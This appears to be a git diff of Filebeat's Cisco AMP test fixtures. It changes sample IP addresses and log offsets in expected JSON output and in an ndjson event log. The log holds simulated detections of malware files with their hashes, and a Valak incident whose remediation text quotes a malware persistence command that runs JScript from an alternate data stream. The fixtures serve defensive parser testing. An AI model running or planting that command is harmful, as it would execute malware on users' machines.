         "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2",
         "related.hash": [
             "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
@@ -1772,7 +1772,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1786,7 +1786,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1821,7 +1821,7 @@
         "host.hostname": "Demo_AMP",
         "host.name": "Demo_AMP",
         "input.type": "log",
-        "log.offset": 46862,
+        "log.offset": 47027,
         "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2",
         "related.hash": [
             "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
@@ -1831,7 +1831,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1843,7 +1843,7 @@
         "@timestamp": "2021-01-13T10:00:07.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1875,7 +1875,7 @@
         "host.hostname": "Demo_AMP",
         "host.name": "Demo_AMP",
         "input.type": "log",
-        "log.offset": 48509,
+        "log.offset": 48679,
         "related.hash": [
             "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"
         ],
@@ -1884,7 +1884,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1898,7 +1898,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1933,7 +1933,7 @@
         "host.hostname": "Demo_AMP_Exploit_Prevention_Audit",
         "host.name": "Demo_AMP_Exploit_Prevention_Audit",
         "input.type": "log",
-        "log.offset": 49613,
+        "log.offset": 49788,
         "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae",
         "related.hash": [
             "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
@@ -1943,7 +1943,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1955,7 +1955,7 @@
         "@timestamp": "2021-01-12T10:15:22.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1981,13 +1981,13 @@
         "host.hostname": "Demo_AMP_Exploit_Prevention_Audit",
         "host.name": "Demo_AMP_Exploit_Prevention_Audit",
         "input.type": "log",
-        "log.offset": 51389,
+        "log.offset": 51569,
         "related.hosts": [
             "Demo_AMP_Exploit_Prevention_Audit"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1999,7 +1999,7 @@
         "@timestamp": "2020-12-25T05:49:09.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2040,7 +2040,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 52332,
+        "log.offset": 52517,
         "process.hash.md5": "38ae1b3c38faef56fe4907922f0385ba",
         "process.hash.sha1": "84123a3decdaa217e3588a1de59fe6cee1998004",
         "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef",
@@ -2056,7 +2056,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2072,7 +2072,7 @@
         "@timestamp": "2020-12-25T05:49:09.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2104,7 +2104,7 @@
         "host.hostname": "Demo_AMP_Intel",
         "host.name": "Demo_AMP_Intel",
         "input.type": "log",
-        "log.offset": 53947,
+        "log.offset": 54137,
         "related.hash": [
             "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"
         ],
@@ -2113,7 +2113,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2125,7 +2125,7 @@
         "@timestamp": "2020-12-25T05:30:44.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2166,7 +2166,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 55057,
+        "log.offset": 55252,
         "process.hash.md5": "92f44e405db16ac55d97e3bfe3b132fa",
         "process.hash.sha1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d",
         "process.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7",
@@ -2182,7 +2182,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2198,7 +2198,7 @@
         "@timestamp": "2020-12-25T05:30:44.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2230,7 +2230,7 @@
         "host.hostname": "Demo_AMP_Intel",
         "host.name": "Demo_AMP_Intel",
         "input.type": "log",
-        "log.offset": 56674,
+        "log.offset": 56874,
         "related.hash": [
             "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"
         ],
@@ -2239,7 +2239,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2253,7 +2253,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2288,7 +2288,7 @@
         "host.hostname": "Demo_AMP_Intel",
         "host.name": "Demo_AMP_Intel",
         "input.type": "log",
-        "log.offset": 57784,
+        "log.offset": 57989,
         "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7",
         "related.hash": [
             "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
@@ -2298,7 +2298,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2312,7 +2312,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2347,7 +2347,7 @@
         "host.hostname": "Demo_AMP_Intel",
         "host.name": "Demo_AMP_Intel",
         "input.type": "log",
-        "log.offset": 59541,
+        "log.offset": 59751,
         "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7",
         "related.hash": [
             "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
@@ -2357,7 +2357,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2369,7 +2369,7 @@
         "@timestamp": "2020-12-25T05:02:27.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2421,7 +2421,7 @@
         "host.hostname": "Demo_AMP_Intel",
         "host.name": "Demo_AMP_Intel",
         "input.type": "log",
-        "log.offset": 61194,
+        "log.offset": 61409,
         "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8",
         "related.hash": [
             "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"
@@ -2431,7 +2431,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2443,7 +2443,7 @@
         "@timestamp": "2020-12-25T05:02:26.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2495,7 +2495,7 @@
         "host.hostname": "Demo_AMP_Intel",
         "host.name": "Demo_AMP_Intel",
         "input.type": "log",
-        "log.offset": 62768,
+        "log.offset": 62988,
         "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8",
         "related.hash": [
             "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"
@@ -2505,7 +2505,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2517,7 +2517,7 @@
         "@timestamp": "2020-12-25T04:32:53.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2599,7 +2599,7 @@
         "host.hostname": "Demo_AMP_Intel",
         "host.name": "Demo_AMP_Intel",
         "input.type": "log",
-        "log.offset": 64342,
+        "log.offset": 64567,
         "process.hash.sha256": "71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243",
         "related.hash": [
             "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"
@@ -2609,7 +2609,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2621,7 +2621,7 @@
         "@timestamp": "2020-12-25T04:22:45.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2647,13 +2647,13 @@
         "host.hostname": "Demo_AMP_Intel",
         "host.name": "Demo_AMP_Intel",
         "input.type": "log",
-        "log.offset": 66455,
+        "log.offset": 66685,
         "related.hosts": [
             "Demo_AMP_Intel"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2665,7 +2665,7 @@
         "@timestamp": "2020-12-25T04:07:21.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2697,13 +2697,13 @@
         "host.hostname": "Demo_AMP_Intel",
         "host.name": "Demo_AMP_Intel",
         "input.type": "log",
-        "log.offset": 67379,
+        "log.offset": 67614,
         "related.hosts": [
             "Demo_AMP_Intel"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2715,7 +2715,7 @@
         "@timestamp": "2020-12-25T04:06:40.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2742,13 +2742,13 @@
         "host.hostname": "Demo_AMP_Intel",
         "host.name": "Demo_AMP_Intel",
         "input.type": "log",
-        "log.offset": 68455,
+        "log.offset": 68695,
         "related.hosts": [
             "Demo_AMP_Intel"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log
index ae6c21d78ff0..ded43bea1625 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log
@@ -1,42 +1,42 @@
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n    - Review all activity performed by the user\r\n    - Upload any suspicious files to ThreatGrid for analysis\r\n    - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n    - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"<p>The adversary is trying to avoid being detected.</p>\n\n<p>Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.</p>\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"<p>Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.</p>\n\n<p>Adversaries may do this using a <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a>, such as <a href=\"https://attack.mitre.org/software/S0106\">cmd</a>, which has functionality to interact with the file system to gather information. Some adversaries may also use <a href=\"https://attack.mitre.org/techniques/T1119\">Automated Collection</a> on the local system.</p>\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"<p>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)</p>\n\n<p>Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</p>\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"<p><strong>This technique has been deprecated. Please use <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a> where appropriate.</strong></p>\n\n<p>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and <a href=\"https://attack.mitre.org/techniques/T1086\">PowerShell</a> but could also be in the form of command-line batch scripts.</p>\n\n<p>Scripts can be embedded inside Office documents as macros that can be set to execute when files used in <a href=\"https://attack.mitre.org/techniques/T1193\">Spearphishing Attachment</a> and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through <a href=\"https://attack.mitre.org/techniques/T1203\">Exploitation for Client Execution</a>, where adversaries will rely on macros being allowed or that the user will accept to activate them.</p>\n\n<p>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</p>\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"<p>The adversary is trying to avoid being detected.</p>\n\n<p>Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.</p>\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"<p>Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.</p>\n\n<p>Adversaries may do this using a <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a>, such as <a href=\"https://attack.mitre.org/software/S0106\">cmd</a>, which has functionality to interact with the file system to gather information. Some adversaries may also use <a href=\"https://attack.mitre.org/techniques/T1119\">Automated Collection</a> on the local system.</p>\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"<p>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)</p>\n\n<p>Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</p>\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"<p><strong>This technique has been deprecated. Please use <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a> where appropriate.</strong></p>\n\n<p>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and <a href=\"https://attack.mitre.org/techniques/T1086\">PowerShell</a> but could also be in the form of command-line batch scripts.</p>\n\n<p>Scripts can be embedded inside Office documents as macros that can be set to execute when files used in <a href=\"https://attack.mitre.org/techniques/T1193\">Spearphishing Attachment</a> and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through <a href=\"https://attack.mitre.org/techniques/T1203\">Exploitation for Client Execution</a>, where adversaries will rely on macros being allowed or that the user will accept to activate them.</p>\n\n<p>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</p>\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
